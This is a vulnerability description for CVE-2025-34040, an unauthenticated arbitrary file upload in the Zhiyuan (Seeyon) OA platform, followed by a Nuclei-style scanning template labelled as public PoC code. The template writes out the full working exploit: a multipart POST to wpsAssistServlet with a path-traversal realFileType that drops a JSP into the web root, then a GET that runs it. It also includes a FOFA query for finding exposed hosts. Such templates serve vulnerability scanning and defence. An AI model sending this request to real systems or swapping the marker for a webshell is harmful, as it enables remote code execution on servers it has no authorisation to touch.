An arbitrary file upload vulnerability exists in the Zhiyuan OA platform 5.0, 5.1 - 5.6sp1, 6.0 - 6.1sp2, 7.0, 7.0sp1 - 7.1, 7.1sp1, and 8.0 - 8.0sp2 via the wpsAssistServlet interface. The realFileType and fileId parameters are improperly validated during multipart file uploads, allowing unauthenticated attackers to upload crafted JSP files outside of intended directories using path traversal. Successful exploitation enables remote code execution as the uploaded file can be accessed and executed through the web server.
PoC代码[已公开]
id: CVE-2025-34040
info:
name: Zhiyuan OA Platform - Arbitrary File Upload
author: iamnoooob,pdresearch
severity: critical
description: |
An arbitrary file upload vulnerability exists in the Zhiyuan OA platform 5.0, 5.1 - 5.6sp1, 6.0 - 6.1sp2, 7.0, 7.0sp1 - 7.1, 7.1sp1, and 8.0 - 8.0sp2 via the wpsAssistServlet interface. The realFileType and fileId parameters are improperly validated during multipart file uploads, allowing unauthenticated attackers to upload crafted JSP files outside of intended directories using path traversal. Successful exploitation enables remote code execution as the uploaded file can be accessed and executed through the web server.
reference:
- https://www.cve.org/CVERecord?id=CVE-2025-34040
- https://www.cnblogs.com/pursue-security/p/17677130.html
classification:
epss-score: 0.11345
epss-percentile: 0.93288
metadata:
verified: true
max-request: 1
fofa-query: body="seeyon/index.jsp"
tags: cve,cve2025,file-upload,intrusive,zhiyuan,lfi,vkev,vuln
variables:
marker: "{{randstr}}"
filename: "{{randbase(8)}}"
http:
- raw:
- |
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{filename}}.jsp&fileId=2 HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel
<%@ page import="java.util.Base64" %><%= new String(Base64.getDecoder().decode("{{base64(marker)}}"), "UTF-8") %>
--59229605f98b8cf290a7b8908b34616b--
matchers:
- type: word
part: body
words:
- "officeTransResultFlag"
- '"success":true'
condition: and
internal: true
- raw:
- |
GET /{{filename}}.jsp HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "{{marker}}"
# digest: 4b0a00483046022100ce5c1abfaeee0a5b4d6f79bf473cd228636696d998060283ddc8fe30b695b40b022100b094cf7917b5132517577a65ecd6dafe98330c74a8f026053fbacf6c47aa2e61:922c64590222798bb761d5b6d8e72950